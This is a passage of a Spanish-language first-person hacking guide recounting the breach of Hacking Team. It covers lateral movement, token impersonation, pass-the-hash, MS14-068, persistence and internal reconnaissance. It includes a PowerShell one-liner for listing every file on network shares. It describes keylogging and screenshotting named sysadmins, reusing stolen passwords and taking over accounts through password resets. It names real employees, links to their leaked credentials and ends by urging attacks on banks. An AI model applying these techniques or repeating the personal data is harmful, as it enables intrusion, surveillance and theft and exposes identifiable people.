  650.    cautelosa. Aparecerá en el registro de eventos el tipo 7045 "Service
  651.    Control Manager". En mi experiencia, nunca se han dado cuenta durante un
  652.    hackeo, pero a veces lo notan después y ayuda a los investigadores entender
  653.    lo que ha hecho el hacker.
  654.  
  655. 2) WMI
  656.  
  657.    La manera más cautelosa. El servicio de WMI está habilitado en todas las
  658.    computadoras de windows, pero salvo por servidores, el firewall lo bloquea
  659.    por defecto.  Puedes usar wmiexec.py [7], pth-wmis [6] (aquí tienen una
  660.    demostración de wmiexec y pth-wmis [8]), invoke_wmi de powershell empire
  661.    [9], o el comando de windows wmic [5]. Todos excepto wmic sólo necesitan el
  662.    hash.
  663.  
  664. 3) PSRemoting [10]
  665.  
  666.    Está deshabilitado por defecto, y no les aconsejo habilitar nuevos
  667.    protocolos que no sean necesarios. Pero si el sysadmin ya lo ha habilitado,
  668.    es muy conveniente, especialmente si usas powershell para todo (y sí,
  669.    deberías usar powershell para casi todo, va a cambiar [11] con powershell 5
  670.    y windows 10, pero hoy en día powershell hace fácil hacer todo en RAM,
  671.    esquivar los antivirus, y dejar pocas huellas).
  672.  
  673. 4) Tareas programadas
  674.  
  675.    Se pueden ejecutar programas remotos con at y schtasks [5]. Funciona en las
  676.    mismas situaciones que psexec, y tambien deja huellas conocidas [12].
  677.  
  678. 5) GPO
  679.  
  680.    Si todos estos protocolos están deshabilitados o bloqueados por el
  681.    firewall, una vez que eres el administrador del dominio, puedes usar GPO
  682.    para darle un logon script, instalar un msi, ejecutar una tarea programada
  683.    [13], o como veremos con la computadora de Mauro Romeo (sysadmin de Hacking
  684.    Team), habilitar WMI y abrir el firewall a través de GPO.
  685.  
  686. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
  687. [2] https://sourceforge.net/projects/winexe/
  688. [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
  689. [4] http://www.powershellempire.com/?page_id=523
  690. [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
  691. [6] https://github.com/byt3bl33d3r/pth-toolkit
  692. [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
  693. [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
  694. [9] http://www.powershellempire.com/?page_id=124
  695. [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
  696. [11] https://adsecurity.org/?p=2277
  697. [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
  698. [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
  699.  
  700.  
  701. Movimiento "in situ":
  702.  
  703. 1) Impersonalizando Tokens
  704.  
  705.    Una vez que tienes acceso administrativo a una computadora, puedes usar los
  706.    tokens de los demás usuarios para acceder a recursos en el dominio.  Dos
  707.    herramientas para hacer esto son incognito [1] y los comandos token::* de
  708.    mimikatz [2].
  709.  
  710. 2) MS14-068
  711.  
  712.    Se puede aprovechar un fallo de validación en kerberos para generar un
  713.    ticket de administrador de dominio [3][4][5].
  714.  
  715. 3) Pass the Hash
  716.  
  717.    Si tienes su hash pero el usuario no tiene sesión iniciada puedes usar
  718.    sekurlsa::pth [2] para obtener un ticket del usuario.
  719.  
  720. 4) Inyección de Procesos
  721.  
  722.    Cualquier RAT puede inyectarse a otro proceso, por ejemplo el comando
  723.    migrate en meterpreter y pupy [6] o psinject [7] en powershell empire.
  724.    Puedes inyectar al proceso que tiene el token que quieras.
  725.  
  726. 5) runas
  727.  
  728.    Esto a veces resulta muy útil porque no require privilegios de
  729.    administrador. El comando es parte de windows, pero si no tienes interfaz
  730.    gráfica puedes usar powershell [8].
  731.  
  732. [1] https://www.indetectables.net/viewtopic.php?p=211165
  733. [2] https://adsecurity.org/?page_id=1821
  734. [3] https://github.com/bidord/pykek
  735. [4] https://adsecurity.org/?p=676
  736. [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
  737. [6] https://github.com/n1nj4sec/pupy
  738. [7] http://www.powershellempire.com/?page_id=273
  739. [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
  740.  
  741.  
  742. ----[ 13.2 - Persistencia ]-----------------------------------------------------
  743.  
  744. Una vez conseguido el acceso, quieres mantenerlo. Realmente, la persistencia
  745. solo es un desafío para hijos de puta como los de Hacking Team que quieren
  746. hackear a activistas u otros individuos. Para hackear empresas, no hace falta
  747. persistencia porque las empresas nunca duermen. Yo siempre uso "persistencia"
  748. al estilo de duqu 2, ejecutar en RAM en un par de servidores con altos
  749. porcentajes de uptime. En el hipotético caso de que todos reinicien a la vez,
  750. tengo contraseñas y un ticket de oro [1] para acceso de reserva. Puedes leer
  751. más información sobre los mecanismos de persistencia para windows aquí
  752. [2][3][4]. Pero para hackear empresas, no hace falta y aumenta el riesgo de
  753. detección.
  754.  
  755. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
  756. [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
  757. [3] http://www.hexacorn.com/blog/category/autostart-persistence/
  758. [4] https://blog.netspi.com/tag/persistence/
  759.  
  760.  
  761. ----[ 13.3 - Reconocimiento interno ]-------------------------------------------
  762.  
  763. La mejor herramienta hoy día para entender redes de Windows es Powerview [1].
  764. Vale la pena leer todo escrito por el autor [2], ante todo [3], [4], [5], y
  765. [6].  Powershell en sí también es muy potente [7]. Como todavía hay muchos
  766. servidores 2003 y 2000 sin powershell, tienes que aprender también la vieja
  767. escuela [8], con herramientas como netview.exe [9] o el comando de windows
  768. "net view". Otras técnicas que me gustan son:
  769.  
  770. 1) Descargar una lista de nombres de archivos
  771.  
  772.    Con una cuenta de administrador de dominio, se pueden descargar todos los
  773.    nombres de archivos en la red con powerview:
  774.  
  775.    Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
  776.    select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
  777.    select fullname | out-file -append files.txt}
  778.  
  779.    Más tarde, puedes leerlo a tu ritmo y elegir cuales quieres descargar.
  780.  
  781. 2) Leer correos
  782.  
  783.    Como ya hemos visto, se pueden descargar correos con powershell, y tienen
  784.    muchísima información útil.
  785.  
  786. 3) Leer sharepoint
  787.  
  788.    Es otro lugar donde muchas empresas tienen información importante. Se puede
  789.    descargar con powershell [10].
  790.  
  791. 4) Active Directory [11]
  792.  
  793.    Tiene mucha información útil sobre usuarios y computadoras. Sin ser
  794.    administrador de dominio, ya se puede encontrar mucha información con
  795.    powerview y otras herramientas [12]. Después de conseguir administrador de
  796.    dominio deberías exportar toda la información de AD con csvde u otra
  797.    herramienta.
  798.  
  799. 5) Espiar a los empleados
  800.  
  801.    Uno de mis pasatiempos favoritos es cazar a los sysadmins. Espiando a
  802.    Christan Pozzi (sysadmin de Hacking Team) conseguí accesso al servidor
  803.    Nagios que me dio acesso a la rete sviluppo (red de desarrollo con el
  804.    código fuente de RCS). Con una combinación sencilla de Get-Keystrokes y
  805.    Get-TimedScreenshot de PowerSploit [13], Do-Exfiltration de nishang [14], y
  806.    GPO, se puede espiar a cualquier empleado o incluso al dominio entero.
  807.  
  808. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  809. [2] http://www.harmj0y.net/blog/tag/powerview/
  810. [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
  811. [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
  812. [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
  813. [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
  814. [7] https://adsecurity.org/?p=2535
  815. [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
  816. [9] https://github.com/mubix/netview
  817. [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
  818. [11] https://adsecurity.org/?page_id=41
  819. [12] http://www.darkoperator.com/?tag=Active+Directory
  820. [13] https://github.com/PowerShellMafia/PowerSploit
  821. [14] https://github.com/samratashok/nishang
  822.  
  823.  
  824. --[ 14 - Cazando Sysadmins ]----------------------------------------------------
  825.  
  826. Al leer la documentación de su infraestructura [1], me di cuenta que aún me
  827. faltaba acceso a algo importante - la "Rete Sviluppo", una red aislada que
  828. guarda todo el código fuente de RCS. Los sysadmins de una empresa siempre
  829. tienen acceso a todo. Busqué en las computadoras de Mauro Romeo y Christian
  830. Pozzi para ver como manejan la red sviluppo, y para ver si había otros
  831. sistemas interesantes que debería investigar. Fue sencillo acceder a sus
  832. computadoras ya que eran parte del dominio de windows en que tenía
  833. administrador. La computadora de Mauro Romeo no tenía ningún puerto abierto,
  834. así que abrí el puerto de WMI [2] para ejecutar meterpreter [3]. Además de
  835. grabar teclas y capturas con Get-Keystrokes y Get-TimedScreenshot, usé muchos
  836. módulos /gather/ de metasploit, CredMan.ps1 [4], y busqué archivos [5]. Al ver
  837. que Pozzi tenía una volumen Truecrypt, esperé hasta que lo había montado para
  838. copiar los archivos entonces. Muchos se han reído de las débiles contraseñas
  839. de Christian Pozzi (y de Christian Pozzi en general, ofrece bastante material
  840. para comedia [6][7][8][9]). Las incluí en la filtración como un despiste y
  841. para reírse de él. La realidad es que mimikatz y keyloggers ven todas las
  842. contraseñas iguales.
  843.  
  844. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
  845. [2] http://www.hammer-software.com/wmigphowto.shtml
  846. [3] https://www.trustedsec.com/june-2015/no_psexec_needed/
  847. [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
  848. [5] http://pwnwiki.io/#!presence/windows/find_files.md
  849. [6] http://archive.is/TbaPy
  850. [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
  851. [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
  852. [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
  853.  
  854.  
  855. --[ 15 - El Puente ]------------------------------------------------------------
  856.  
  857. Dentro del volumen cifrado de Christian Pozzi, había un textfile con muchas
  858. contraseñas [1]. Una de ellas fue para un servidor de Fully Automated Nagios,
  859. que tenía acceso a la red sviluppo para poder monitorizarla. Había encontrado
  860. el puente. Sólo tenía la contraseña para la interfaz web, pero había una
  861. exploit pública [2] para ejecutar código y conseguir un shell (es un exploit
  862. no autenticado, pero hace falta que un usuario tenga sesión iniciada para la
  863. cual usé la contraseña del textfile).
  864.  
  865. [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
  866. [2] http://seclists.org/fulldisclosure/2014/Oct/78
  867.  
  868.  
  869. --[ 16 - Reutilizando y restableciendo contraseñas ]----------------------------
  870.  
  871. Leyendo los correos, había visto a Daniele Milan concediendo acceso a
  872. repositorios git. Ya tuve su contraseña de windows gracias a mimikatz. La
  873. intenté con el servidor git y funcionó. Intenté sudo y funcionó. Para el
  874. servidor gitlab y su cuenta de twitter, utilicé la función "olvidé mi
  875. contraseña", y mi acceso al servidor de correos para restablecer la
  876. contraseña.
  877.  
  878.  
  879. --[ 17 - Conclusión ]-----------------------------------------------------------
  880.  
  881. Ya está. Así de fácil es derrumbar una empresa y parar sus abusos contra
  882. derechos humanos. Eso es la belleza y la asimetría del hacking: con sólo cien
  883. horas de trabajo, una sola persona se puede deshacer años de trabajo de una
  884. empresa multimillonaria. El hacking nos da la posibilidad a los desposeídos de
  885. luchar y vencer.
  886.  
  887. Las guías de hacking suelen terminar con una advertencia: esta información es
  888. solo para fines educativos, sé un hacker ético, no ataques a computadoras sin
  889. permiso, blablablá. Voy a decir lo mismo, pero con un concepto más rebelde de
  890. hacking "ético". Sería hacking ético filtrar documentos, expropiar dinero a
  891. los bancos, y proteger las computadoras de la gente común. Sin embargo, la
  892. mayoría de las personas que se autodenominan "hackers éticos" trabajan sólo
  893. para proteger a los que pagan su tarifa de consultoría, que a menudo son los
  894. mismos que más merecen ser hackeados.
  895.  
  896. En Hacking Team se ven a sí mismos como parte de una tradición de inspirador
  897. diseño italiano [1]. Yo les veo a Vincenzetti, su empresa, y sus amigotes de
  898. la policía, carabineros, y gobierno, como parte de una larga tradición de
  899. fascismo italiano. Quiero dedicar esta guía a las víctimas del asalto a la
  900. escuela Armando Diaz, y a todos aquellos que han derramado su sangre a manos
  901. de fascistas italianos.
  902.  
  903. [1] https://twitter.com/coracurrier/status/618104723263090688
  904.  
  905.  
  906. --[ 18 - Contacto ]-------------------------------------------------------------
  907.  
  908. Para mandarme intentos de spearphishing, amenazas de muerte escritas en
  909. italiano [1][2], y para regalarme 0days o acceso dentro de bancos,
  910. corporaciones, gobiernos etc.
  911.  
  912. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
  913. [2] https://twitter.com/CthulhuSec/status/619459002854977537
  914.  
  915. solamente correos cifrados porfa:
  916. https://securityinabox.org/es/thunderbird_usarenigmail
  917. -----BEGIN PGP PUBLIC KEY BLOCK-----
  918.  
  919. mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
  920. vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
  921. 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
  922. +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
  923. VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
  924. Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
  925. Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
  926. BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
  927. QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
  928. cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
  929. JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
  930. 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
  931. X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
  932. VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
  933. oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
  934. n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
  935. Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
  936. WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
  937. jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
  938. CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
  939. OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
  940. LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
  941. JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
  942. Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
  943. D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
  944. =E5+y
  945. -----END PGP PUBLIC KEY BLOCK-----
  946.  
  947.  
  948.  
  949.                     Si no tú, ¿quién? Si no ahora, ¿cuándo?
  950.                 _   _            _      ____             _    _
  951.                | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
  952.                | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
  953.                |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
  954.                |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
RAW Paste Data
Top